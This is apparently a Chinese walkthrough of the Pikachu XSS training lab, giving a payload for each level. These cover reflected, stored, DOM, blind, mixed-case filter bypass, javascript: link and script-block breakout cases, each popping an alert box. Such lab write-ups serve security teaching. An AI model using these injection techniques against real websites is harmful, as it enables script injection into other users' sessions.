pikachu-XSS闯关挑战

get

复制代码
message=<script>alert("123")</script>&submit=submit

post

可以暴力破解账号密码,但由于是XSS练习,点右上角的提示,就可以登陆

直接在输入框中输入

复制代码
<script>alert("123")</script>

存储型

复制代码
<script>alert("123")</script>

DOM

随意输入可以看到提示

进入源码找到提示,将标签闭合

复制代码
' onclick="alert('123')"

xss-x

同样的语句,链接点两次

盲打

在留言板输入,发现没有变化,在提示中看到登陆后台

复制代码
<script>alert("456")</script>

在后台可以看到弹窗

过滤

输入发现被过滤

大小写混合,成功

复制代码
<SCriPt>alert("123")</sCrIPt>

html

可以看到源码时链接

输入

复制代码
javascript:alert(/xss/)

href

输入上一个,点击链接即可

js输出

看到源码是一个script语句,将前面的闭合,再写一个新的弹窗

复制代码
</script><script>alert("123")</script>
相关推荐
xixingzhe27 小时前
SpringBoot + Nginx 免鉴权接口安全防护方案
运维·nginx·安全
中科岩创7 小时前
宁波某大学高支模施工安全监测实训模型应用
科技·物联网·安全·自动化
项目经理老王8 小时前
OpenClaw无捆绑安装包,安全纯净版AI助手部署
人工智能·安全
小李@Free2FA14 小时前
跨境卖家多平台二次验证统一管理
安全·外贸·2fa·二次验证
fei_sun15 小时前
开放最短路径优先OSPF----基于链路状态
网络
精明的身影15 小时前
网络计划WebApp求解:融合Python与AI决策的项目管理系统
网络·python·web app
云祺vinchin15 小时前
混合云异构环境下的灾备实战:VMware+Hyper-V统一保护方案解析
安全·容灾备份·容灾备份体系
MartinYeung516 小时前
从注入攻击到诈骗:@martin_yeung/llm-up-guardrail 提供生产级 AI 安全防护
人工智能·安全
Let's Chat Coding16 小时前
对称密钥认证:主机和设备共享同一把密钥
运维·服务器·网络
anbingsoft1217 小时前
企业加密软件软件有哪些?企业加密软件:让设计图纸安全无忧,年度热销
网络·安全·电脑